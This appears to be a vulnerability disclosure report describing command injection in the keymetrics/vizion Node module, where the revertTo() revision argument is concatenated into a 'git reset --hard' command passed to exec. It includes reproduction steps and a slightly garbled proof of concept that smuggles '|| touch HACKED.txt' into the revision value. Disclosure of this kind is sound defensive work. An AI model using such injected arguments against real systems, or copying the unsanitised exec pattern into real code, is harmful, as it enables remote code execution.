Code Injection in keymetrics/vizion


Reported on

Apr 3rd 2020


The issue is an RCE triggerable via the module.

This is possible because in the line, the git reset --hard command is concatenated with a unsanitized input:

  var command = cliCommand(args.folder, "git reset --hard " + args.revision);

The command variable is so passed to the exec function, declared as:

var exec = require('child_process').exec;

This makes possible any attacker to control the revision attribute passed as object in the <vizion_object>.revertTo() function, leading to the RCE impact.

Steps To Reproduce

  1. First of all, note you have to set accurately your git environment
  2. Execute the following commands:
mkdir vizion # Makes a new directory where initialize *git*
cd vizion
git init
echo "TEST_STRING" > test.txt # Create a file named "test.txt" 
git add test.txt # Adding to the working tree the new file
git commit
  1. Create a PoC file like this (in the vizion directory):
// poc.js
var vizion = require('vizion');
           revision : 'f0a1d45936cf7a3c969e4caba96546fd23255796 || touch HACKED.txt', folder : '.' }, 
           function(err, data) { 
  1. Start the poc.js file: node poc.js
  2. A file named HACKED.txt will be created {F580132}



to join this conversation